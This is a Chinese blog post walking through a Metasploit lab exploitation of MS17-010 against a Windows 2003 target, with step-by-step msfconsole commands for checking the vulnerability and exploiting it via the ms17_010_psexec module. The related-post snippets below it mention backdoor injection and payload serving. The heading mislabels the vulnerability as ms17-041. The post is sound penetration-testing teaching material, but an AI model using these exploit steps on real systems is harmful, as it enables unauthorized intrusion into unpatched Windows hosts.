Metasploit系列----系统测试

最新推荐文章于 2022-08-02 00:32:17 发布
最新推荐文章于 2022-08-02 00:32:17 发布
阅读量82 收藏
点赞数
分类专栏: Metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lushuaibao/article/details/115836723
版权

测试环境

攻击环境:kali
目标靶机:windows2003(192.168.1.8)

系统测试(测试漏洞ms17-041)

在kali中使用msfconsole启动msf程序
在这里插入图片描述search ms17-010 搜索可以使用的模块
在这里插入图片描述使用 use auxiliary/admin/smb/ms17_010_command进入该模块
使用set rhosts 192.168.1.8设置目标IP
使用 run 进行检测,看到系统存在ma17-010漏洞
在这里插入图片描述
使用 use exploit/windows/smb/ms17_010_psexec进入漏洞利用模块,run 运行
在这里插入图片描述使用ipconfig查看信息,说明漏洞利用成功。
在这里插入图片描述

注:

不同的模块切换均需要设置rhosts 可使用 setg rhosts IP设置全局的rhosts

midsummer_woo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Metasploit(后渗透攻击:操作系统后门)
qq_41453632的博客
12-10 3664
   在完成了权限提升之后,我们就应该建立后门(backdoor)了,以维持对目标主机的控制权,这样一来,即使我们所利用的漏洞被补丁程序修复,还可以通过后门继续控制目标系统。 1.Cymothoa后门    Cymothoa是一款可以将ShellCode注入现有进程(即插进程)的后门工具。借助这种注入手段,,他能够把shellcode伪装成常规程序。他所注入的后门程序应当能够与被注入的程序(进...
metasploit 初学(一)
热门推荐
小山岷的专栏
11-24 2万+
每个人都有死穴,在武侠片中经常可以看到,点到某人死穴,轻者此人被控、武功被废,重则当场瘫痪或毙命。可以参考武侠片各种大侠。 对于系统而言,存在有或多或少的漏洞,而这些漏洞则很容易被攻击者利用,并成功渗透入主机。 只有了解如何渗透,才能进行反渗透。 metasploit是渗透测试很流行的工具,最近开始记录学习metasploit的过程: 一 安装: 1 对于64位系统: wget h
Metasploit系统命令)
qq_41453632的博客
12-02 336
获得了稳定的进程后,接下来收集系统信息。    输入  sysinfo  命令(查看目标机的系统信息):   输入  run  post/windows/gather/checkvm  命令(检查目标机是否运行在虚拟机上): 我这里不是在虚拟机上的,如果在虚拟机上会显示(this  is  a  wmware virtual  machine)   输入  idletime  命令...
Metasploit(MSF)基础超级详细版
懂进攻知防守
08-02 1万+
The Metasploit Framework 的简称。 MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一。 是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。 metasploit 涵盖了渗透测试中全过程,你可以在这个框架下利用现有的 Payload进行一系列的渗透测试。 ............
使用metasploit漏洞测试
PwnGuo的博客
09-14 2101
没网闲着无聊,灵魂无处安放呀,就简单的用metasploit玩玩。 实验环境: 目标主机:Windows XP professional 攻击机: kali linux 1.漏洞扫描 nmap --script=vuln 172.20.10.5 扫描结果提示,易受攻击的有: 1.CVE-2008-4250 Microsoft Windows系统易受远程代码执行攻击(MS08...
Metasploit系列----模块详解
bronze_s的博客
04-25 1386
kali linux中默认集成了metasploit Framework社区版本,是精简后的免费版本。使用者多为安全研究人员或学生。 metasploit中的模块分类 exploit(渗透模块): 是一段程序,运行时会利用目标的安全漏洞进行安全测试。 payload(安全测试载荷模块): 在成功对目标完成一次渗透测试,payload将在目标机器运行,帮助我们获取目标上需要的访问和运行权限。 auxiliary(辅助模块): 包含扫描、fuzz测试、漏洞挖掘、网络协议欺骗等程序。 encoder(编码器模
Metasploit系列----kage可视化
bronze_s的博客
04-23 827
Kage环境搭建 下载链接:https://github.com/Zerx0r/Kage/releases 在linux中安装选择第一个: 使用 ./Kage.0.1.1-beta_linux.AppImage运行Kage打开可视化界面。点击按钮自动启动数据,生成用户名密码 使用kage对windows系统进行测试 目标机器:windows2003 攻击机器:kali linux 点击生成payload,会给出kage.exe的路径 在kage路径下使用python -m SimpleHTTPS
Metasploit笔记---框架结构
孤的博客
09-20 1949
metasploit体系结构 基础库文件 metasploit基础库文件位于源码根目录路径下的libraries目录中,包括Rex,framework-core和framework-base三部分。 Rex是整个框架所依赖的最基础的一些组件,如包装的网络套接字、网络应用协议客户端与服务端实现、日志子系统、渗透攻击支持例程、PostgreSQL以及MySQL数据库支持等; framework-co...
metasploit-webapp-nostarch.zip
08-12
在Web应用程序安全测试中,`metasploit-webapp-nostarch`这个压缩包可能包含了一系列针对Web应用程序漏洞的exploits(攻击模块)、payloads(有效载荷)和auxiliary(辅助)工具。这些工具可以帮助测试者识别和利用...
salstack-metasploit-formula:SaltStack Metasploit 公式
07-02
这意味着你可以利用SaltStack的强大分布式系统管理功能,来控制Metasploit在多台主机上运行渗透测试或漏洞扫描任务,从而实现规模化、自动化地进行安全审计。 【详细知识点】 1. **SaltStack**:SaltStack是一个...
渗透测试-认识Metesploit.pdf
02-25
Metasploit是一个流行的渗透测试工具,它提供了一系列的模块,用于信息搜集、漏洞分析、漏洞利用、后渗透攻击等。本文档是关于渗透测试及其在Metasploit中的应用的读书笔记,其内容涵盖了渗透测试的分类、标准的渗透...
Metasploit-1陆小马功钟浩.pdf
09-14
Metasploit是一个流行的渗透测试框架,广泛用于安全专家、黑客以及系统管理员进行安全评估。利用Metasploit进行溢出,通常指的是通过各种漏洞进行渗透测试。文档中提到的“Use命令”是选择Metasploit框架中的特定...
kali-book-en
05-07
Kali Linux集成了一系列强大的工具,覆盖了渗透测试的所有方面。例如,使用Nmap进行网络扫描,Metasploit进行漏洞利用等。 ##### 3.2 开放源代码与社区支持 由于Kali Linux遵循开源原则,用户可以通过社区获得丰富...
H为供应链的变革、模式和方法.pdf
最新发布
08-24
H为供应链的变革、模式和方法.pdf
java源码资源很强的Java加密解密算法源码
08-24
java源码资源很强的Java加密解密算法源码提取方式是百度网盘分享地址
五、前后端分离通用权限系统(5)gansu-system-front.zip
08-24
五、前后端分离通用权限系统(5)gansu-system-front.zip
CIMPLICITY.zip
08-24
CIMPLICITY.zip
一个R语言与微信公众号接口的实践_Example-for-R-Weixin.zip
08-24
一个R语言与微信公众号接口的实践_Example-for-R-Weixin
metasploitframework-latest
07-13
Metasploit Framework 是一个开源的渗透测试工具,它提供了一系列的漏洞利用模块、Payload生成器和其他辅助工具,帮助安全专业人员评估系统和网络的安全性。 要获取最新版本的 Metasploit Framework,你可以按照...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

midsummer_woo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值